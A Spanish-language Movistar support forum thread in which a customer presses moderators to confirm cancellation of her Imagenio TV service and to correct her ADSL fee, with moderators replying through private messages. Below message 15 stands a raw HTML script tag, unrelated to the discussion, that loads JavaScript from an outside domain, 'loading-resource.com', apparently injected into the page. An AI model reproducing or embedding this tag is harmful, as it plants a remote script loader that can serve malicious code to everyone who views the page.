Confirmación Baja Imagenio

songjjtaime
Yo probé el VDSL
Confirmación Baja Imagenio

Hola Buenas tardes,

El lunes día 8-10-12  a las 19: 00 horas solicité la baja del servicio de imagenio. La persona del Dpto. de calidad que me atendió, me dijo que en 15 días ( o sea, el día 23) se haría efectiva la misma.

Ante esto, le dije que no, que tal y como indica la ley, la baja solicitada de un servicio debe hacerse efectiva en un plazo máximo de 48 horas. Tras un rato en espera, me dijo que de acuerdo, que hoy miércoles 10 tendría dado de baja el servicio de imagenio .

Se supone que en apenas dos horas breves, ya no debería tener imagenio y la baja debería estar cursada.

¿ Por favor, algún moderador me puede confirmar que esto es así, que efectivamente se está tramitando mi baja?..... por que en el canal cliente no veo nada que indique que está la baja en curso.

 

Agradecería una respuesta, porque si no, veo que como siempre, me toca pelear con el 1004...y no es nada agradable

 

Un saludo y gracias

Mensaje 1 de 18
2.410 Visitas
17 RESPUESTAS 17
ATRAGALU
Yo probé el VDSL

Hola.

 

Quisiera aprovechar el tema abierto para solicitar confirmacion de la baja que tenia que ser efectiva hoy dia 10.

 

De momento sigo teniendo servicio

 

Muchas gracias y un saludo

Mensaje 2 de 18
2.397 Visitas
Escualeno
Yo probé el VDSL

Pues yo tengo más suerte que vosotros, el lunes pedí que me pasaran a fusion con imagenio y hoy martes me han dado de baja en imageneo y me han cortado el ADSL sin pedirlo, luego en 48 horas son capaces, si quieren, de cortar el servicio.

Mensaje 3 de 18
2.389 Visitas
songjjtaime
Yo probé el VDSL

No hay ningún moderador que me ayude???

Ayer en el momento que hacía las 48 horas, efectivamente el imagenio dejó de verse.....En  la pantalla de la televisión al probar si funcionaba o no, aparecía un mensaje que decía que había ¿¿problemas en la conexión??

¿ Esto significa que efectivametne ya tengo la baja tramitada?

  Por otra parte en la página web del canal cliente me aparecen en el apartado de pedidos pendientes, que la baja fue solicitada ayer en lugar del lunes día 8 y se producirá  ( fecha estimada ) el día 15-10. Tambén me aparece una modificación con la misma fecha estimada en la tarifa plana de llamadas ( yo ya la tenía.!!!!...)

Espero que movistar no me cobre ninguna llamada, porque yo no he solicitado ninguna variación en la línea ni en el adsl, únicamente la baja en imagenio y también aparece no se que cosa más que no me entiendo.

Por cierto, pone también que mi velocidad será a partir del 15 ¿¿?? de hasta 6 mb como tenía hasta ahora , pero tengo entendioo que esta velocidad ya no existe ¿no? ...sino que es 10 Mb.

¿ me cobrarán más que lo que pago ahora 19,90 + linea + Iva si solicito aumento de la velocidad a 10 mb?

 

Espero respuesta .

Gracias

Mensaje 4 de 18
2.358 Visitas
Chelo-Movistar
Antiguo Moderador

Hola @songjjtaime,

 

 

para ver el estado en que se encuentra la baja del servicio imagenio, necesito que me facilites en un MP tu número de teléfono y DNI

 

 

Saludos,




Consulta nuestras ofertas y servicios sobre miMovistarTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.


No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar


Una de las ventajas es poder ver tu factura en Consulta Factura online.


También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram




Solución aceptada.png
Etiquetas (1)
Mensaje 5 de 18
2.341 Visitas
songjjtaime
Yo probé el VDSL

Chelo-Movistar, te envié hace mucho un privado con los datos

Siento no haberte podido responder antes para decirtelo

 

Mensaje 6 de 18
2.329 Visitas
Chelo-Movistar
Antiguo Moderador

Hola @songjjtaime,

 

 

te puedo decir que he estado mirando y la baja de imagenio ya está en curso. Te he enviado un mp con un poquito más de información.

 

Saludos,




Consulta nuestras ofertas y servicios sobre miMovistarTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.


No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar


Una de las ventajas es poder ver tu factura en Consulta Factura online.


También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram




Solución aceptada.png
Mensaje 7 de 18
2.317 Visitas
songjjtaime
Yo probé el VDSL

OK, ya lo he visto.

Yo tambien te he vuelto a enviar otro privado...no me he dado cuenta de contestarte en el foro,

Lo siento

Mensaje 8 de 18
2.309 Visitas
songjjtaime
Yo probé el VDSL

Hola Chelo-Movistar

Te comunico que ayer lunes 15-10 vinieron a recogerme el deco. Me dijiste que te lo indicase cuando viniesen para ver la promo que me dejaban aplicada  y demás.

 

¿ Me puedes confirmar que efectivamente la baja está cursada?  Lo digo por que en la web de canal cliente sigue apareciendo como un pedido activo o pendiente.......no me fío...... que luego no quiero llevarme sustos en la factura....ya te comentné que me cortaron el servicio el mieroles día 10-10....con lo cual debe ser el último día que movistar me facture.......

 

Si necesitas algún dato para confirmar  que la promo que me han dejado es la de 19,90 + línea + IVA por tener línea movil asociada o algún otro, dímelo y te paso otro mp.

 

Por cierto, en el  1004 me han asegurado que ¿¿¿¿no pueden aplicarme los 10 mb?????

En la actualidad no llego ni a 6 mb.

 

Muchas gracias

 

Mensaje 9 de 18
2.223 Visitas
songjjtaime
Yo probé el VDSL

Chelo_movistar.....aún no me has contestsado,

Cuando tengas un ratito me dices algo, vale?

 

Gracias

 

 

Mensaje 10 de 18
2.180 Visitas
dela-movistar
Antiguo Moderador

Hola songjjtaime

 

Ya me comenta Chelo, que te dice enseguida algo por privado.

 

Perdona , que estamos un poco apurados.

 

Un Saludo



Si necesitas soporte técnico en averías de Móvil, Fijo, Movistar+ o Internet Fijo (cobre o fibra), puedes acceder desde tu Smartphone al apartado “Configuración y Soporte” de la APP MI MOVISTAR (Android, IOS), o a nuestro apartado de Soporte Técnico o rellenar este formulario. También puedes contactar con nosotros llamando al 1002.

 Si necesitas contratar Fibra Ópticacomprobar tu cobertura Adsl y Fibrao ver información sobre la instalación de la fibra visita nuestra página ADSL y Fibra en movistar.es 

Solución aceptada.png
Mensaje 11 de 18
2.154 Visitas
Chelo-Movistar
Antiguo Moderador

hola @songjjtaime,

 

 

actualmente tienes contratado el adsl a 29,90 euros. A esta cuota hay que añadirle la cuota mensual de línea telefónica 13,97 euros y el Iva.

 

Un saludo,




Consulta nuestras ofertas y servicios sobre miMovistarTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.


No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar


Una de las ventajas es poder ver tu factura en Consulta Factura online.


También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram




Solución aceptada.png
Mensaje 12 de 18
2.152 Visitas
songjjtaime
Yo probé el VDSL

Hola

¿como que el Adsl a 29, 90 ? yo debería tener el adsl a 19,90 + linea + iva por tener un movil de movistar asociado al adsl....

¿puedes mirarmelo? 

Si es realmente así, espero que lo cambien y en la factura no venga el importe de 29,90 mas iva por el adsl porque inmediatametne doy de baja el adsl y las dos lineas de movistar movil que tenemos mi marido y yo.-

Ya estoy muy cansada de movistar y sus tomaduras de pelo.....

Espero que haya sido un error lo del 29,90 por que si no en movistar me van a escuchar......

Gracias

 

Mensaje 13 de 18
2.046 Visitas
Julio-Movistar
Antiguo Moderador

Hola @songjjtaime:

 

Chelo está de vacaciones. Me puedes mandar tus datos por privado?

Salu2




Consulta nuestras ofertas y servicios sobre miMovistarTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.


No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar


Una de las ventajas es poder ver tu factura en Consulta Factura online.


También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram




Solución aceptada.png
Mensaje 14 de 18
2.025 Visitas
songjjtaime
Yo probé el VDSL

Hola Julio-Movistar

Ya te he mandado los datos por privado

Si necesitas alguno más dímelo

Gracias

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>
Mensaje 15 de 18
2.010 Visitas
songjjtaime
Yo probé el VDSL

Hola Julio-Movistar........

 

Sigo esperando...Te envié el privado el viernes con los datos y no me has dicho nada aún.....

Cuando puedas, por favor.

Salu2

 

 

 

Mensaje 16 de 18
1.924 Visitas
Julio-Movistar
Antiguo Moderador

Hola @songjjtaime:

 

Te acabo de responder por privado indicándote que ya te he gestionado el ADSL a 19,9

Salu2




Consulta nuestras ofertas y servicios sobre miMovistarTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.


No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar


Una de las ventajas es poder ver tu factura en Consulta Factura online.


También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram




Solución aceptada.png
Mensaje 17 de 18
1.881 Visitas
songjjtaime
Yo probé el VDSL

ok, lo he visto y te he enviado otro MP a su vez

Salu2

Mensaje 18 de 18
1.876 Visitas